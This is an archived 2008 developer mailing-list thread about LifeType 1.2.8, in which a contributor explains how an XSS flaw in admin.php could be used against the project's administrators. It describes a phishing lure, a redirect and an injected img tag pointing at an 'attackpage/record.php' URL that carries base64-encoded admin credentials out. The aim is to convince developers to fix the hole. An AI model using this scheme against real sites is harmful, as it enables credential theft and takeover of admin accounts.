[pLog-svn] Lifetype 1.2.8 ...

Matt Wood matt at woodzy.com
Mon May 5 10:47:38 EDT 2008 

Oh and its just as bad for single users and multiple... your safe if you
NEVER have other tabs open and always sign out... but... thats not standard
behavior (at least for me)

On Mon, May 5, 2008 at 10:44 AM, Matt Wood <matt at woodzy.com> wrote:

> Here is a common exploitation scenario for you...
>
> An Attacker is targeting the lifetype.net site, he wants admin.
>
> He knows from emails and reading around that Oscar, Reto, Mark and Jon are
> likely to have admin on that page, so he makes a webpage on geocities or
> google or something.
>
> On this webpage he has javascript (or a meta refresh tag or an HTTP 302)
> that immediately redirects you to lifetype.net/admin.php with some
> javascript payload utilitizing the XSS exploit.
>
> This javascript payload can utilize XSS to create an img tag, this img tag
> has a src of
> http://attackpage/record.php?data=admincredentials-base64ed(or<http://attackpage/record.php?data=admincredentials-base64ed%28or>something) as long as the data fits in the get parameters. You could also
> create a form and have no limit.
>
> Now all the attacker has to do is email each of you telling you that he
> has found a serious bug in lifetype, and he has screenshots on this page
> http://google/blah.(html|php|jpg)<http://google/blah.%28html%7Cphp%7Cjpg%29>(depending on his level of control of the site). Maybe he even puts screen
> shots on there so it doesn't look too scary... and uses an iframe to do the
> actual attack. You would never know unless you are monitoring all your
> traffic through a proxy.
>
> XSS is ALWAYS serious.
>
>
> On Mon, May 5, 2008 at 1:00 AM, Mark Wu <markplace at gmail.com> wrote:
>
> > >       Can you post an example?  I am still not getting how
> > > the server-side is involved. I understand that if I put
> > > javascript on the admin's site, the javascript would have
> > > access to stuff, but the browser is supposed to block
> > > javascript from grabbing stuff from one site and posting it
> > > to another, right?  So, somehow he grabs stuff via
> > > javascript, posts it to admin.php which then posts stuff to
> > > another site?
> >
> > I have  no idea either. Reto, if you can provide an example here, that
> > willl
> > very helpful.
> >
> > >       Sure, that's fine, but as far as I can tell, all inputs
> > > would be susceptible to the same problem, so fixing one
> > > variable isn't really a fix.
> >
> > Not "all" inputs, just those inputs that we use string validator and
> > does
> > not filtered by htmlfilter( strip tags) or displayed without escape html
> > special characters ...
> >
> > I think quite few ..
> >
> > Mark
> >
> > _______________________________________________
> > pLog-svn mailing list
> > pLog-svn at devel.lifetype.net
> > http://limedaley.com/mailman/listinfo/plog-svn
> >
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://limedaley.com/pipermail/plog-svn/attachments/20080505/460f8fb0/attachment.htm>

More information about the pLog-svn mailing list